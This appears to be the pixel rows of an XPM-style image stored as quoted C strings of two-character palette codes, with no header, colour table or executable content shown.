"QtQtQt.#QtQt.#QtQt.#Qt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.t#Q.S.T.T.1.R.9#d#n#n#w#K#w.Z#w.Z#w#r#o#n#n#e#e#n#e#e#e#e#e#e#e#e#e#e#n#o#n#n#n#e#e#e#n#e#e#e#e#o#r#n#f.2.j.S#h.z#6#7#8",
".#QtQtQt.P#9a.a#aa#D.v.O.#.u.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.sab.G.T.1.3.R.9#e#n.Z.Z#w#w.Z#A.Z.Z#w#r#r#n#e#f#e#n#n#n#e#e#e#n#e#e#n#e#e#n#n#e#e#e#f#e#n#e#n#f#e#o#r#n#n#..I.i#oac#Q#3#I",
"QtQt.uad.1aeafagaeahaeai.4.Faj.q.s.O.u.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.Pak.T.T.3#.#.#g#f#r#w#A#Fal.Z#A#A#w#w#r#r#o#n#e#e#e#e#e#e#e#e#e#e#n#o#n#e#e#n#e#e#e#e#e#e#n#e#n#e#e#r#r#e#o#..G.y.2amanaoap",
"Qt.uaqahararafaiaiaiaeafafaraealasat.P.q.O.uQtQtQtQtQt.#QtQtQtQtQtQtQtQtQtQtQt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQtQt.Eau.K.K.3.9#.#d#e#o#wal#####Fal#A.Z#A.Z#K#o#o#n#e#e#n#n#e#e#n#e#e#n#e#e#e#e#e#n#n#e#f#e#e#n#e#e#e#n#e#r#o#e#n#d.0av.Kawaqax#J",
"Qtayaiafafafaraiaeaearahahaiafagafae#Xaz.b.P.D.t.#QtQtQtQtQtQtQtQtQtQt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQt.#Qt#S.8.T.1.2.9#.#f#o.Z#A#FaA#haA#F#A#A#A#A.Z#w#r#o#e#f#n#e#e#e#f#e#e#f#e#e#e#e#n#e#n#n#e#e#e#e#n#e#e#e#e#e#r#o#e#o#e.0.y.S.UaB.Q.p",
".5.xarafav.k.y.lahav.l.l.j.laiafaeaiaiae.k#vaCaD#z.s.u.#QtQt.#QtQtQtQtQt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.##y.4.K.3.2.9#f#e#o.Z#####haEaE#h#F#F#Fal#A.Z#w#r#o#f#f#e#e#e#e#e#n#n#e#e#n#n#n#n#n#n#n#e#e#e#e#o#n#n#n#e#f#r#r#n#o#e.K.y.IaE.zaF#a",
"#r.yagai.l.jah.y.k.l.i.i.H.i.k.yahaearafaiaiae#haG#t.P.r.t.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQtQtaj#r.3.2.9#d#f#n#A##al#FaAaEaEaEaA####aAalal.Z#K#r#o#f#f#n#e#e#n#n#e#n#e#e#n#e#e#n#n#n#n#e#e#e#e#n#n#n#n#f#e#r#n#f#o#e.3av.i##akaHaI",
".S.l.k.y.i.i.j.J.S.S.G.G.I.i.x.i.i.i.k.kavaiarafae.GaJaKaD.q.O.uQtQtQt.#QtQt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtaL#n.3.R#.#g#e#o#AalaAaE.maE.m.maE#h###F#Falal.Z#K#r#o#f#e#n#n#e#e#n#e#e#e#n#e#e#e#e#n#n#e#e#n#n#e#e#e#n#e#e#f#n#n#e#e#d#..l.j#AaM#PaN",
".K.i.y.l.x.J.I.J.0.T.0.0.G.I.H.I.J.J.x.l.kahavaraOaraeaf.oaP.X.P.r.u.uQt.#QtQt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#Qt#b#r.2.9.9#.#n#K#A##.m.4.4aQ.4.4.maE#h#####Falal#w#K#r#n#e#n#n#n#e#e#n#e#e#n#n#n#n#n#e#e#e#e#n#n#n#e#e#e#n#e#f#n#n#f#f#e#f#g.l.y#KaR.L#H",
".1.x.l.i.S.1.S.T.1.0.0.0.S.G.S.I.x.x.l.k.y.k.k.j.l.y.kaiaear.4aS#t#u.q.t.#Qt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.XaT.1.2#d#e#n#A##.maE.U.U.U.UaQaQ.4.m#h###F#Falal#w#K#o#n#e#e#e#e#n#e#n#e#e#e#e#e#n#n#e#e#n#n#n#e#e#e#e#e#e#e#n#n#e#e#f#f#f#d.lav#oaU.F#3",
"#f.I.j.H.0.1.1.S.3.1.0.0.0.S.S.T.J.H.x.j.j.l.i.x.i.k.k.l.lavaiag.Ka.#kaD.r.O.uQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.s#v.R.3#.#f#r#FaA.4.4aVaVaVaV.UaQ.U.4.m#haA#Falalal.Z#K#o#n#n#f#n#e#n#e#n#n#n#n#n#n#e#e#n#e#n#o#n#e#e#e#o#n#e#n#e#e#e#n#e#e#e#d.jah#e#m.g.f",
"aW.T.x.G.1.9.2.1.1.K.K.K.T.0.0.S.S.G.S.H.H.I.I.H.x.x.x.x.javahahavah#.#V#kaD.r.O.uQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQt.#QtQt.F#..2#g#f#o.Z#h.UaTaV.8aVaVaVaQaQaQ.4.maEaA###Falal.Z#K#r#n#e#f#e#n#n#f#e#e#e#n#n#e#n#n#n#n#e#e#e#n#e#e#e#e#e#e#e#n#e#e#f#f#f#d.iav#daXaY.Y",
"#H.R.I.K.R.9.2.3.3.3.1.1.K.K.0.0.S.S.S.J.J.I.J.H.G.G.S.J.j.yavavahaiaeaO.3aZ.WaD.q.O.tQtQtQt.#Qt.#QtQt.#QtQt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQt.#ao#..9#g#f#wal#F.maV.8awawa0a0aVaQaQaQ.maE#h###Falalal#w#K#o#n#n#e#n#n#n#e#n#e#e#e#n#e#e#e#e#e#n#e#n#n#e#e#n#e#e#n#e#e#e#e#f#e#e#f.jae#g.haJa1",
".b#h.J.1#g.9#d.9.3.1.1.1.1.1.K.K.R.R.1.K.T.G.J.I.J.H.I.H.i.lavaiaeah.yavaear#o#1.WaD.q.O.#QtQt.#QtQtQt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQta2#e#g#d#f#w##.4.UaTawaw.8.8.8aV.U.U.4.4.maE#h###F#Falal.Z#K#r#n#n#e#e#n#n#e#e#e#e#e#e#n#e#e#e#e#o#e#e#n#n#f#e#n#n#n#n#e#e#n#f#e#e#f.xar#.a3a4#C",
"#ta5.1.9#e#n#o#f.R.1.1.1.3.3.K.K.2.R.1.K.T.S.G.G.J.T.T.H.j.j.l.l.x.kai.yahahaeae#o.Q#t#l.q.O.#QtQtQtQtQtQt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#Qt.eaE.9.9#e#K#A.maTaw#T#T#Taw.8a0aV.U.U.4.4.maE#h#####Fal#A#w#K#r#e#e#e#n#n#n#e#e#e#e#n#e#n#e#n#n#e#n#e#e#n#n#e#n#e#e#e#o#n#n#n#e#e#f#f.xae#.a3a6#C",
".Ea7.9.0#g.9#f#r#g.2.2.2.9.9.3.3.R.R.1.K.T.T.G.G.S.I.I.G.G.J.x.x.j.l.i.l.j.k.kavaiae.ZaSa8aD.q.s.#QtQt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt#l#m#g#g#f#KalaE.U.8#T#X#T#Tawawa0aVaT.UaQ.4.maE#haA#Fal.Z#A#K#K#r#e#e#e#e#e#n#n#e#e#e#n#n#e#e#e#e#e#n#n#e#e#e#e#n#e#n#e#n#n#e#n#e#e#f#f.kar.9a9b.ao",
"#Ob#ba.2#..2#f.Z#d#g#d#d#d#..R.3.3.R.1.1.K.0.T.S.S.G.G.J.I.J.I.x.i.j.i.l.i.i.l.l.yavahav#A#N.E#l.r.O.#QtQtQt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtay#o#f#d#o#AaA.Ua0#T#Xbb#Tbc.8bc.8aVaTaTaQ.4aE#haA##al.Z#w#A#w#K#r#n#e#f#e#e#e#e#e#e#e#o#n#e#n#e#e#e#e#n#e#n#e#e#e#e#n#e#n#n#n#n#e#e#f#f.kar.9bbbdao",
"#u.Maa.R.1.3#.#r#f#f#o#o#n#g.R.3.2.9.9.9.2.R.3.1.1.K.0.T.T.T.G.I.H.x.i.j.l.j.j.i.j.i.lahaf.j#Q.e.7.P.r.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt#0#w#f#f#o#AaE.Ua0#Tbca9a3#X#Tawaw.8aVaTaT.4.4.maE#haA###F.Z#A#w#r#o#e#e#f#n#n#e#e#e#e#e#o#e#e#n#e#n#e#e#n#e#e#e#n#o#e#e#n#e#n#n#n#e#f#d#g.lae.2#X#Bbe",
".qbfbg.h.R#g#n#f#n#o#K#K#w#n#..2.9.9#..9.9.2.3.3.K.1.K.0.K.T.G.J.J.J.H.x.x.x.x.x.j.j.i.yaharaiaVa7.W.d.P.s.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.#Qta4#n#n#o.Z#haQaw#Ta9a9a9am#Xbc.8aw.8aVaTaVaQ.4.maE#haA##al.Z.Z#w#K#o#n#n#e#e#n#e#e#e#n#e#n#e#n#n#e#n#e#e#e#n#n#e#e#e#e#n#o#e#n#n#n#f#f#f#..lai.2#X#Bbe",
".t.Bbh.Q.R.9#r.9#e#o#o#r#o#f#..2#.#g#.#..9.2.R.2.1.K.K.0.0.T.T.S.S.S.J.I.J.J.H.x.j.j.x.j.kaeaeai.ja..v.E#u.O.uQtQtQtQt.#QtQtQtQtQt.#QtQtQtQtQtQtQtQtbi#K#n#o#K##.Ubca9a3a3a3a3a3#X#Xbcbca0.U.U.U.4.m#h#haA###F#A.Z#A#w#K#r#e#e#e#n#e#n#e#e#e#e#n#n#e#n#e#e#e#e#e#n#e#e#e#e#e#n#n#e#n#n#e#f#e#f.9avai.R#X#Ebj",
".u#z.Wbk.4.R#e#f#n#r#r#r#w#K#f#g#n#e#e#d#..9.9.2.3.1.K.K.1.K.K.T.0.T.G.J.I.I.H.i.J.x.x.i.javav.yafafau.V.W.X.q.tQtQtQtQtQtQtQtQtQtQtQt.#.#Qt.#QtQtQt#v#e#n#KalaQawbba3a3a3ama3a3bb#Xbcbc.8aTaQaQaQ.4.maE#haA###F.Zal#w#r#r#n#e#f#e#e#n#e#e#n#n#e#e#e#e#e#n#e#n#e#e#e#n#n#e#e#n#n#e#o#n#f#e#n#d.2ahai.2#X#Ebj",
".#.D.N#ybl.9#g#n#o#r#K#w#w#o#f#f#.#g#d#d#g#..9.R.1.1.1.K.K.K.1.K.T.S.S.S.S.S.G.H.I.i.i.x.J.G.J.i.xaraO.1#x.M.7#u.s.uQtQtQtQtQtQtQt.#QtQtQtQtQtQtQt.c#o#o#r#A.m.8#Xamam.haXaXam.ha3bb#Tbc.8.U.4.4.UaQ.4.maE#h###F.Z.Z#K#r#o#n#e#e#e#e#e#e#e#e#e#n#n#e#e#e#e#e#e#e#n#e#e#e#e#n#n#n#e#o#n#f#f#n#d.Raeai.2#X#Bbe",
"Qt.t#u.b#J.4.2#r#n#w#Aal.Z#o#e#e#f#e#n#n#n#f.9.2.2.R.1.K.K.K.K.K.0.0.T.T.0.0.S.I.x.x.H.H.x.i.x.i.kavaiafaOaW.A#taD.r.t.uQtQtQtQtQtQtQtQtQtQtQtQt.saX#n#n#waA.UbcamaXauauauaX.h.ha9#X#Tbc.8aT.4.m.4aEaE#haA##alal#A#A#w#K#r#n#e#n#e#e#e#n#n#e#e#n#e#e#e#e#e#e#e#e#e#e#n#n#e#n#n#n#e#n#n#e#d#f#f.Rarah.9a9b.ao",
"Qt.#.r.7bm#V.3#..Z#n#r#F#r#e#w#K#e#e#e#e#e#d.9.9.2.9.2.3.1.0.0.0.K.K.1.K.0.K.T.G.G.G.I.I.I.H.I.H.j.x.x.x.yai#Kbnbo#O.P.OQtQtQtQtQtQtQtQt.#QtQtQtbn#K#o#K#F.m.8#XaXauaXaX.h.ha3a3a9#Xbcaw.8a0aVaV.UaQaQ.maE#haAaA#F##al.Z#r#o#e#f#d#e#n#e#e#n#e#e#e#e#e#e#e#f#d#f#o#o#f#f#e#e#o#n#f#e#d#n#n#n#f.Sagav#gama4#C",
".#Qt.t#l.MbpaM#.#r#A.Z#w#r#w#A#r#o#n#o#o#e#e#d#g#g#..2.R.R.1.K.T.1.1.3.1.0.0.0.S.J.S.J.I.I.J.J.H.G.H.H.x.j.yah.lbqb#bf#l.D.uQtQtQtQt.#QtQt.#QtQt#L#r#oal.ma0#T.h.haXaXama3a3a3a9aw.8.8.8a0a0.UaQ.U.4.m#h###Falal#w#w#K#r#o#o#n#e#r#K#o#e#n#n#e#f#f#e#e#f#f#f#f#e#n#o#f#e#e#f#n#n#e#o#d#n#n#e#d.Sbr.y#faXaY.Y",
"QtQt.#.q.7.A#3#F#.#wal#w#w###F#K#K#r#K#r#n#n#f#f#f#f#g.9.9.3.1.0.3.1.1.K.0.K.K.0.T.S.S.T.S.S.S.S.x.k.H.i.i.yaiaeafaG#j.W.X.D.t.#bsbt#obubo.O.Obmal#ral#haQ#TbbaXaX#mau.ha3a3a9a9#Tbcawawaw.8aT.UaQaQ.m#haA#F#Fal#Fal#w#K#o#e#f#f#n#n#e#n#o#o#n#n#f#e#f#f#f#e#e#n#n#n#f#f#e#e#n#n#f#n#d#n#n#f#..HaO.k#e#m.g.f",
"QtQt.#.O.d.Mbp#Y.2#r#F.Zal.m###w.Z#w#w#w#w#K#o#K#r#r#o#n#e#g.9.R.R.2.R.3.3.1.K.1.1.0.K.0.T.0.T.T.y.j.I.J.i.l.yahar.Jbvbibo.B.q.raA.yaear.h.X.d.L###o#F.4aVa9a9au#p#p#maX.ha3bbbb#X#Tbcbcawa0.U.UaE.maE#h###Fal#A##al.Z#K#o#r#e#f#d#e#e#e#n#n#e#e#e#e#d#f#n#o#e#f#n#e#f#f#e#e#e#n#o#n#f#n#e#f#..iaf.j#oaUbwbx",
"QtQtQt.#.q.Ebm#7a9#eal#h#h#h#w.Zalal.Z.Z#K#K#o#o#r#r#n#n#e#f#g#..R.1.3.1.1.K.3.1.3.3.1.1.K.0.0.K.j.i.J.J.x.H.x.Iavah#gbxby.6.BaI.yaeaiaraf#MbyaT#h#KaEaQ.8au#mbzauauaXama3a9a9#Xbc.8.8aVaTaV.U.4#haA#haA####.Z.Z#K#r#o#n#n#n#d#g#.#f#o#n#d#d#f#e#n#n#e#e#n#n#n#n#e#e#f#f#f#e#n#n#e#e#e#r#n#g.2.kag.x#Kaca#bA",
"QtQtQtQt.O#l.b#ZbB#e#K####aE#A#######F#A#w#w#K#w#K#K#o#o#n#n#f#d#..2.2.3.1.K.3.3.3.3.1.K.K.0.0.K.I.H.I.J.I.J.J.H.l.y.k#ebv#I.Mbe.kaeavavae.Sacal.4#h.Uaw#Xbz#mbza3amamamamamama3ama3a3a3a3ama3a9bbbb#X#Tbc.8aT.U.maE##.Z#K#n#..9.9#g#f#f#.#g#f#e#n#n#n#n#o#n#o#o#n#n#f#f#f#e#n#e#f#e#f#o#o#g.3avar.x.Z.nbCbn",
"QtQtQtQt.#.r.Nat.pbt#d.Z##.m#haQaE#h##al#A.Z.Z#w#K#r#n#n#n#n#e#f#..9.2.R.R.3.R.R.R.R.3.3.3.K.K.K.1.0.T.T.S.J.I.j.x.H.k.H##bnbs#Vahafai.yavaeai.SaE.U#Tbba3bzbz#maXau#mbzbzbzaUaU.n.n#2aMaMaMaM.nbDbD.o.o#p#mauau.ha3#Ta0.UaA.Z#r#n#n#d#.#.#d#f#e#f#e#n#o#r#n#n#n#n#n#e#f#e#n#n#n#e#n#e#r#n#..Kafae.xalbEasaP",
".#QtQtQtQt.t.P#tbibFaT.Zal.U.U.U.m#haA####al#A.Z.Z#w#r#r#r#r#r#r#f#f#g#g#..2.9.2.2.2.R.R.R.1.1.1.T.0.3.K.T.J.J.J.x.G.i.yav#.bd.mafaf.y.H.iafbr.y#Fawbb.haX#paR.oaRbD#2aMaM#2aMbEbEbGba#vbH#vbabEaM#2aRac.oaU.o.oaUaUbz#mauam#Xaw.maA#K#f#d#f#d#g#g#f#e#o#o#n#o#o#e#e#f#e#e#n#n#n#n#n#f#K#o.9.0aOar.IaA#v#6#7",
"QtQtQtQtQt.#.s.d.6a2#s#d#oaA.4.UaQ.4aEaEaA#Fal#A#w#w#K#K#r#r#r#r#o#n#f#f#d#g#.#..2.9.2.R.R.R.3.3.9.9.9.1.K.S.I.I.T.G.J.I.x.kahafaOae.yavav.laibI.K.8aua3ac#m#2aMaMbEbGbaakbabaak#vbabEbEbGbEaM#2.naRacac#p#pbz#p#m#m.h.h.h.h.hama3#XaV.4aAal#K#e#d#d#g#f#o#o#n#n#e#e#e#e#e#n#e#e#n#r#f#r#r.2.IbJar.S.4aWbK#q",
"QtQtQtQtQtQt.#.q.7#W#a#2.ZaEaA.U.8a0.UaQaEaE##al#Aal#A#A.Z#w#w#K#r#n#r#o#o#o#f#e#g#g.9.9.2.3.3.3#.#.#..R.K.T.J.G.S.S.S.G.H.l.kaebraf.k.j.l.laibLah.ZbDacaU.n#LaM#2aMbEbGbGbEbGbGbabGbEbGbabGaM.n#2aRaRaRaU#pbz#p#m#maX.hama3a3bbbbbb#X#XawaTaE#F#K#o#f#f#e#e#n#o#o#n#n#o#o#n#e#n#e#K#n#r#r.3.kbIah.Ka0btaSa7",
"QtQtQtQtQtQtQt.t.C#S#Ia1alalaA.Ua0a0aQ.4.4.m#h#F#F#F#Falal.Z#w#K#o#n#o#o#o#n#f#f#d#..2.2.R.1.1.3.3.2.R.R.3.K.T.T.0.T.T.S.J.x.lahagar.y.j.I.j.kaebL.HaXaMacbEbMbGaMbEbaakakbGbabGbGbGbGbaakbG#2bD#2bDacacaU#p#p#p#pbzauaX.hama3a9#T#T#T#X#T.8aT.UaE#F#K#n#e#e#e#o#o#n#n#o#o#o#n#o#e#o#o#o#n.0agbIav.2#X#E#xbp",
"QtQtQtQtQtQtQtQt.D.d.v#J#B#n.U.4aVaV.UaQaQ.4.m#h#h#haA####al#A.Z#w#K#o#K#K#r#r#n#e#f#g.9.2.R.R.3.1.R.3.2.3.1.0.T.T.0.0.0.T.H.iavaeagae.y.H.x.x.jarbr#AaMbE.nbaakbEbGbaakakbababGbGbGbabaakbaaM.nbDaR.oacaUbz#p#paU#p#maX.ha3a3a9#Tbcaw.8a0aVaTa0a0.4aA#A#K#o#d#f#n#e#e#e#n#r#o#o#f#n#o#e#r.0bJaO.y#faXaYaabk",
"QtQtQtQtQtQtQtQt.u.ra8#jaIa0#AaEaTaVaT.UaQ.UaQaQaAaA#haAaA#F#A.Z.Z.Z.Z#w#w#r#o#o#d#g#.#g#..2.R.K.K.T.1.R.2.2.3.1.K.K.K.K.K.G.I.javagafav.H.J.G.I.ybr.l#Xak.n#2bEbEbEbGbGbGbGbabEbGbGaMbGbabGaM.nbDacacac.obzbz#pbz#maXamama3a9a9a9#TbcawaVaV.8aw.8aV.4.m#h.Z#o#o#e#f#d#e#o#o#o#n#e#d#e#e#f.JbNaf.j#Kaca#bAbi",
"QtQtQtQtQtQtQtQtQt.O#u#0bkaZ#e#FaTa0.8aV.U.U.U.U.m.m.maE#h###Fal#F#A.Z.Z#A#K#r#o#n#n#e#e#e#d#g.R.3.0.1.R.2.2.3.3.K.1.1.1.K.S.G.xahaOagav.I.G.S.IahaebO#f.o#vbG#2bGbGbGbGakbGbabGbabGbEbEbGbGaM#2#2aRacac.o#p#p#pbzaX.h.hamama3a3#X#Tbcaw.8.8.8.8.U.UaQ.4.4aAal#w#n#e#d#f#n#n#n#n#e#d#f#n#..ybNae.H#Fba#G#ibm",
"QtQtQtQtQtQtQtQtQt.#.D.Nb#bPbE#w.4aT.U.UaV.UaTaQaT.UaQ.m#haA###F#h##al.Z#w#K#K#o#o#o#o#n#o#o#e#g.R.1.3.R.2.9.R.3.0.K.K.1.0.K.3.1avafafai.j.J.T.G.y.jbN.k.4bG#2bEakbabGbGbaak#vbababGbGbGbGbGaMaM.naRaRac.o#pbz#p#pauaX.hama3a9a9bcbcaw.8.8.8aTaQ.4.m.maQ.U.m###F#K#o#f#f#n#n#e#f#e#f#f#o.0brbJae.TaQ#UaZ#qb#",
"QtQtQtQtQtQtQtQt.#Qt.t.P#tbi#R##.4.maTaQ.8.8.8aTa0a0aT.U.m#h#h#haE#haA#Falalal#A.Z#w#r#o#r#r#r#n#f#.#.#.#d#d#..9.K.K.K.1.K.1.3.3ahagbragav.x.T.0.I.jbrbI#.bD.nbababGbEbEbGakakbababGbGbGbGbGaM#2.naRac.o.o#p#p#mbzauaXamama9bbbb#X#Tbc.8.8.8aTaQaQ.4.m.m.4.m#haA#w#K#n#n#o#o#e#f#n#e#e#w.TbOaOah.RbcbQax#J.6",
"QtQtQtQtQtQtQtQtQt.#Qt.D.d.e#D.g#oaV.m.Ua9awawaw.8a0a0aVaQ#h#haE.maA##aAaA#####F#w#r#r#r#r#e#d#g#f.9.9#f#e#g.3.3.1.K.T.K.1.2#g#f.S.yaObLar.j.G.T.S.k.lbLaha0#2bGbEbGbGbEbababEbabababGbGbEaMbE#2bDaRaRacaU#p#pbzbz#maXam.hama9a9#X#Tbcawaw.8aVaTaQ.maEaEaEaEaE.m###F#A#w#r#n#e#f#n#n#d#g.ibRbL.y#faXa5a1.V#S",
"QtQtQtQtQtQtQtQt.#QtQt.#.q.Ebm.cbzalaQbcbb.8awbcbc.8a0a0aT.4.maQaQaE#haEaE#haA##al.Z.Z.Z#w#o#n#n#r#e#e#o#n#g.R.R.1.K.T.K.3.R.9#d.0.ybrbLar.l.I.S.S.j.jafbI.9aR#vbEba#vbabEbGbEbGbGbabGbGbE#2bE#2.naRac.oaUaUaUbzbzauaXamamama3bb#XbcbcbcawaVaTaTaT.4.m.m.m#h#h.maEaE##al#K#o#n#n#e#e#f.2avbNaO.x#A#2bC#HaKa8",
"QtQtQtQtQtQtQtQtQtQtQtQt.O#u#Sbkbj#F#hbb.8bcbcbb#Xbcawawa0aT.UaT.UaQ.maE.m.maEaA##alalalal#w#K#w#r#o#r#r#e.9.1.1.1.K.0.3.R.R#.#d.9.jagbLafav.x.T.S.I.l.kbSafbcbGbEbGakbaaMbEbabGbGbGbGbGbGbEbE#2bDbDaRaU#p#p#p#pbz#mau.h.hama3a9#Xbcbcbcawa0aVaV.U.U.4.maE#haE#haE#h###A#K#o#o#n#f#d#e.KagbOaf.TaQ#UaFbT#b.B",
"QtQtQtQtQtQtQtQtQtQtQt.#.#.s#Ob#.pa#alaTaV#X.ha3#X#Xbcbcaw.8aVaTaVaT.4.4aQaQ.maE#h#######F#A.Z#A#K#K#r#n#..1.0.1.K.0.0.1.2.R#g#g#g.lbLbObLae.j.S.0.S.y.iagbO#raubGaM#2bababGakbabGbEbGbGbGbGbE#2bDbDaRaUaU#p#pbzbz#maXamaXama9a9#Tbcbcawawa0aTaT.U.U.4.4.m#haE#h#h#h#F.Z#K#o#n#n#d#n#n.JbLbLah.2bb#BbUaL.M.C",
"QtQtQtQtQtQtQtQtQtQtQtQtQt.t.P#caKaNbG.Z.mbcaubba3a3#X#TbcawawaV.8.U.U.UaQaQaQ.maA#F##aA#Fal#A#F#F.Z#w#e.2.T.1.2.R.R.R.9#..9#.#g#d.JafbLbLaf.k.J.T.J.l.k.lbravaE#vbEbDakbHbababGbGbEbGbabGbEaM#2bDbDaRaU#p#p#pbzbz#maXam.hama9a9#Xbcbc.8.8a0aVaT.UaQ.4.4aEaEaAaA#haA#F.Z.Z#K#K#r#n#f#.avbSaO.j#Kac.FbV#I#t.q",
"QtQtQtQtQtQtQtQtQtQtQtQtQt.#.OaD.MbWaoaV#h.8ambba3ama3a9#X#Tbca0.8.8aT.UaVaTaTaQ.4aE#haAaAaA##aA#h#w#e.9.K.S.K.R.R.2.2#.#.#.#d#d#..SaibJbObrah.i.G.J.Jai.kagbR#daRbHaM#vaWbabGaMbEbEbGbabGbEaM.n.nbDacaUaU#p#pbzbz#mauamamama3a9#Xbcawawawa0aTaV.UaQ.m.maEaEaAaAaA#Fal#A#A#w#w#K#o#n.RagbIaf.S.m.zay#7#W#O.O",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.r.N#b.p#6##.4bc#X.hauaXa3bb#X#T.8bc#T.8a0a0aVaTaQaQ.maEaEaE#h.m.maA#n.3.S.K.K.1.R.9.2.2#g#d#d#e#n#..1.jagbIbrarah.J.x.1.lahaibS.i.8akbGbG.zakbabEbGbEbGbGbGbEaM.n.nbDaR.oaU#p#pbzbz#maX.h.ha3a9a9#Xbcbcbcawa0aTaV.UaQ.4.maEaE#haAaA###F#A#A.Z.Z#w#o#g.JbSbLah.2bb#Eax#J.6#l.t",
"QtQtQtQtQtQtQtQtQtQtQt.#QtQtQt.t#u#taKaNaq#haT#Xam#m#mama3#Xbcbc#Xawaw.8.8.8aVaTaQaQaEaE.4aE.m.4al#..I.x.1.9#..2.9.2.2#.#f#d#f#n#..3.HagbNbIagae.I.x.2.Hav.kbLbr#oak#vbG#Lba#vaMbabGbGbGbGbGaM.n.nbDaR.oaU#p#pbzbz#mau.hamama3a9#Tbcawbc.8.8aVaVaQaQ.4.4.m.m#h#haA###F#A#A.Z.Z#w#n#g.xbRbL.x#waR#QbV#I#t.q.#",
"QtQtQtQtQtQtQtQtQtQtQt.#QtQtQt.#.saDbobkbVaX.Z.8a9#X.h#mama9a9bca9#T#Tbcbcbcawa0aV.4.UaV.m.maTaE#o.S.H.1.9.R.9#g.2#.#.#g#f#e#n#n#n#g.KavbIbNbJag.l.G.0.I.j.kaebO.xbcbHbE#2bHbHbEbabGbabGbGbEaM.n.naRacaUaU#p#pbzbz#mau.hamama3a9bb#X#Tbc.8.8aTaTaQaQ.4.4.maEaAaAaAal#F#Fal#w#w.Z#r.1afbLae.T.U#UbX.c#W#O.DQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.u.r#Ob##5aG.U.U#Xa9au#m.hamama9bbbb#X#T#T#Tbc.8aVaTaTaV.UaVaQaA.3.G.G.1.R.2#g.9.2.9#.#g#d#e#n#n#o#g.1.kbJbRbNaOav.x.T.I.j.jaibrar#wbEbabE#LbEbEbabababGbGbEaM.n.naRaRaU#p#p#pbzbz#maX.h.ha3a9a9bb#Xbcaw.8.8aVaT.UaQ.4.m.m#haAaA###F#Fal.Z#K#wal#w.0aOaf.y#f.ha4#x#D.M#u.tQt",
"QtQtQtQtQtQtQtQt.#QtQtQtQtQtQtQtQt.t.q#cbm.cbw#hawbbaXaXam.h.ha9a9a9bb#T#Tbcaw.8.8a0a0aVawbb.4#e.J.T.1.R.9#d#f.9#g#.#g#f#e#e#o#o.Z#e#g.GafbSbRbLar.l.J.S.J.i.yaebr.HaXakbG#v#2babababGbEbGbEaM.n.naRaR.o#p#p#pbzbz#mauamamama3a9bb#Tbcawawa0aT.U.UaQ.4.m.maEaAaA#F###F.Z#K#K.Z#F#w.Gaiai.Hal.nbCbAbi#c.q.#Qt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.O#u#0#I#H#L.4aw.h#maX.h.ha3ama9ama9#X#Tbcbcbcbc#Ta0#Tbb#F.0.I.T.R.2.9#e#o#g#.#g#f#d#e#n#r#K#K#f#g.SarbRbRbrarav.H.T.T.H.kavbrafaQakbG#2bE#vbabababEbGbEaM.n.naRaR.oaU#p#pbzbz#maXam.hama9a9bb#Tbcawbc.8aV.UaQaQ.4.m.maEaAaA#F#F#Fal.Z#K#K.Z#o.R.T.x.K.4#UbKbT#y.B.sQtQt",
